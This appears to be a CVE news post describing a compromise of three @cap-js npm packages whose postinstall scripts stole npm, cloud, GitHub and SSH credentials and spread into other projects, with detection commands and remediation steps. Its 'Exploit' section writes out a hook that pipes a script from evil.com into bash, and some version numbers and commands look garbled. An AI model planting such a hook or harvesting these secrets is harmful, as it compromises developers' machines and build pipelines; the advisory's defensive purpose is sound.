Nodejs/npm, Supply Chain Compromise, CVE-TBD (Critical)

Listen to this Post

The attack exploits the npm package registry’s trust model by publishing malicious minor/patch versions of three widely used CAP (Cloud Application Programming) modules: @cap-js/[email protected], @cap-js/[email protected], and @cap-js/[email protected]. These versions were injected with post‑install scripts that run immediately after npm install.
The malicious code first enumerates the local machine’s environment variables, configuration files (~/.npmrc, ~/.aws/credentials, ~/.ssh/, ~/.config/gcloud/), and known credential stores (e.g., keyrings, token caches). It exfiltrates all found secrets – including npm authentication tokens, cloud provider access keys (AWS, GCP, Azure), GitHub personal access tokens (PATs), and SSH private keys – to an attacker‑controlled C2 server via encrypted HTTPS requests.
Additionally, the payload attempts self‑propagation by scanning the local `node_modules` tree and any Git repositories in parent directories. For every package it can write to (based on filesystem permissions), it injects itself into their `postinstall` hooks or adds a malicious dependency version range, thereby turning the compromised machine into a distribution point for further supply chain infections.
The attack leverages the fact that npm installs packages with the same privileges as the user running the command (often a CI/CD pipeline or developer with broad access). No interaction or special permissions are required beyond executing `npm install` – the malicious code runs automatically. The compromised versions have been removed from the registry, but any installation that occurred between April 29, 2026 and the removal date (≈ May 14, 2026) is considered fully breached.
Post‑exploitation, the attacker can use harvested npm tokens to publish additional malicious packages under compromised maintainer accounts, cloud credentials to spin up cryptominers or data exfiltration infrastructure, and SSH keys to pivot to production servers. The self‑propagation module specifically targets CI/CD environments by looking for environment variables like `CI=true` and then attempting to backdoor build caches.

DailyCVE Form:

Platform: NPM/Node.js
Version: 2.2.2/2.10.1
Vulnerability: Supply chain compromise
Severity: Critical
date: May 20,2026

Prediction: Already patched May14,2026

Analytics under What Undercode Say:

Check if compromised versions were ever installed
npm list @cap-js/sqlite @cap-js/postgres @cap-js/db-service --depth=0
Search for malicious postinstall scripts in node_modules
grep -r "postinstall" node_modules/@cap-js//package.json
Look for unexpected outbound connections (C2 beaconing)
sudo tcpdump -i any -n 'host <C2_IP> and port 443' -c 10
Simulate credential harvesting pattern (detection only)
find ~ -name ".npmrc" -o -name ".aws/credentials" -o -name ".ssh/id_" 2>/dev/null

Exploit:

Attacker publishes versions 2.2.2, 2.2.2, `2.10.1` with `postinstall` script pointing to node_modules/.bin/malicious. Script runs `curl` to exfiltrate $NPM_TOKEN, $AWS_ACCESS_KEY_ID, ~/.ssh/, and git config --global github.token. Then recursively writes `”postinstall”: “curl -s http://evil.com/backdoor.sh | bash”` into every `package.json` it can modify within /home, /ci/workspace, and /app.

Protection from this CVE:

  • Immediately upgrade to @cap-js/[email protected], @cap-js/[email protected], `@cap-js/[email protected]` or newer.
  • Rotate all npm tokens, cloud provider keys, GitHub PATs, and SSH keys used on any machine that ever installed the compromised versions.
  • Enforce `npm install –ignore-scripts` in CI/CD and for untrusted packages, then audit manually.
  • Use a private npm registry or dependency firewall (e.g., Socket, Snyk) to block known malicious versions.

Impact:

Complete credential compromise of the affected machine. Attackers gain persistent access to cloud infrastructure, source code repositories, and npm publishing rights. Self‑propagation can backdoor entire build pipelines and developer workstations, leading to widespread supply chain infiltration across dependent projects. No data integrity or availability impact – only confidentiality and access control are fully lost.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top